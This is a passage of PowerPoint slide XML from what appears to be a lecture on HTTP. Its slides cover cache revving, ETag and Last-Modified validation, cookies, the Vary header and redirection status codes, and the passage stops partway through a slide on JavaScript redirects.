              <a:t>are the resources that would benefit the most from caching </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>resources</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is typical of the technical resources included and linked from each Web pages: JavaScript and CSS files change infrequently, but when they change you want them to be updated quickly</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•Web </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>developers invented a technique </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>called </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>revving. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr marL="0" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>•Infrequently </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>updated files are named in specific way: in their URL, usually in the filename, a revision (or version) number is added. That way each new revision of this resource is considered as a resource on its own that never changes and that can have an expiration time very far in the future, usually one year or even more. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2046456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ETags</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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ETag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> response header is an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>opaque-to-the-user-agent </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>value that can be used as a strong validator. That means that a HTTP user-agent, such as the browser, does not know what this string represents and can't predict what its value would be. If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ETag</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header was part of the response for a resource, the client can issue an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If-None-Match</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> in the header of future requests – in order to validate the cached resource.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last-Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> response header can be used as a weak validator. It is considered weak because it only has 1-second resolution. If the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Last-Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header is present in a response, then the client can issue an </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>If-Modified-Since</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> request header to validate the cached document.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When a validation request is made, the server can either ignore the validation request and response with a normal </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>200 OK</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>, or it can return </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>304 Not Modified </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>(with an empty body) to instruct the browser to use its cached copy. The latter response can also include headers that update the expiration time of the cached document.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="858730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cookies</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="1219200"/>
            <a:ext cx="8991600" cy="5638800"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>An HTTP cookie </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>a small piece of data that a server sends to the user's web browser, that may store it and send it back together with the next request to the same server. </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>main purpose of a cookie is to identify users and possibly prepare customized Web pages or to save site login information for you.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>When you enter a Web site using cookies, you may be asked to fill out a form providing personal information; like your name, e-mail address, and interests. This information is packaged into a cookie and sent to your Web browser, which then stores the information for later use. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>next time you go to the same Web site, your browser will send the cookie to the Web server. The message is sent back to the server each time the browser requests a page from the server.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies remembers </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>stateful</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> information for the stateless HTTP protocol.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Cookies </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are mainly used for three purposes:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Session management (user logins, shopping carts)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Personalization (user preferences)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Tracking (analyzing user behavior)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Cookies have also been used for general client-side storage. While this use could have been considered legitimate at a time when there was no other way to store data on the client side, it is no longer the case nowadays where web browsers are capable of using various storage </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>APIs (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>localStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>sessionStorage</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>). </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Since cookies are sent along with every request, it can be an additional performance burden (especially for mobile web). </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4117628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Varying responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Vary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> HTTP response header determines how to match future request headers to decide whether a cached response can be used rather than requesting a fresh one from the origin server</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>It </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>is used by the server to indicate which headers it used when selecting a representation of a resource in a content negotiation algorithm.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>This </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>can be useful for serving content dynamically, for example. When using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Vary: User-Agent</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> header, caching servers should consider the user agent when deciding whether to serve the page from cache. If you are serving different content to mobile users, it can help you to avoid that a cache may mistakenly serve a desktop version of your site to your mobile users. </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="4079933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3305160" cy="2286000"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Varying responses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect l="1916" t="1914" r="4086"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2971800" y="38100"/>
            <a:ext cx="6121276" cy="6819900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2054375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NZ" dirty="0"/>
              <a:t>Redirections in HTTP</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2"/>
          <a:srcRect t="3698"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="2455100"/>
            <a:ext cx="8769246" cy="4402899"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="152400" y="838200"/>
            <a:ext cx="8839200" cy="1981200"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="70000" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>URL redirection, or URL forwarding, is a technique to keep links alive while the actual resource, being a page, a form or a whole Web application, is located at a different URL. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP, a redirection is triggered by the server by sending special responses to a request: redirects. HTTP redirects are responses with a status code of 3xx. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>A </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>browser, when receiving a redirect response, uses the new URL provided and immediately loads it: most of the time, the redirection is transparent to the user, besides a small performance hit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3650678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Redirection types</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1219200"/>
            <a:ext cx="9144000" cy="5486400"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Permanent redirections: These redirections are meant to last forever. They imply that the original URL should not be used anymore and that the new one is preferred. Search engine robots trigger an update of the associated URL for the resource in their indexes.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>301	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Moved Permanently</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Reorganization </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>of a Web site. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>308	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Permanent Redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: Reorganization of a Web site, with non-GET links/operations.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Temporary redirections</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Sometimes </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>the requested resource cannot be accessed from its canonical location, but it can be accessed from another place. In this case a temporary redirect can be used. Search engine robots don't memorize the new, temporary link. Temporary redirections are also used when creating, updating and deleting resources to present temporary progress pages.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>302	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Found</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>:The</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> Web page is temporary not available for reasons that have not been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>foreseen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. That way, search engines doesn't update their links. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>303	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>See </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Other</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>:Used</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>to redirect after a PUT or a POST to prevent a refresh of the page that would re-trigger the operation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>307	Temporary Redirect</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Web page is temporary not available for reasons that have not been </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>foreseen</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Special </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>redirections</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>300	Multiple Choice</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>redirections choices </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>are listed in an HTML page in the body</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>304	Not </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>Modified</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>: Cache </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>refresh: this indicates that the cache value is still fresh an can be used.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="436217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Alternative way of specifying redirections</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Content Placeholder 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>HTTP redirects aren't the only way to defining redirections. There are two other methods: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>redirections using the &lt;meta&gt; </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>element. When </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>displaying the page, the browser will find this element and will go to the indicated page</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>The </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
                <a:cs typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              </a:rPr>
              <a:t>content</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> attribute starts with a number indicating how many seconds the browser should wait before redirecting to the given URL. Always set it to 0, for better accessibility.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-NZ" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:endParaRPr lang="en-NZ" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>redirections using the </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM and  created </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>by setting a value to the </a:t>
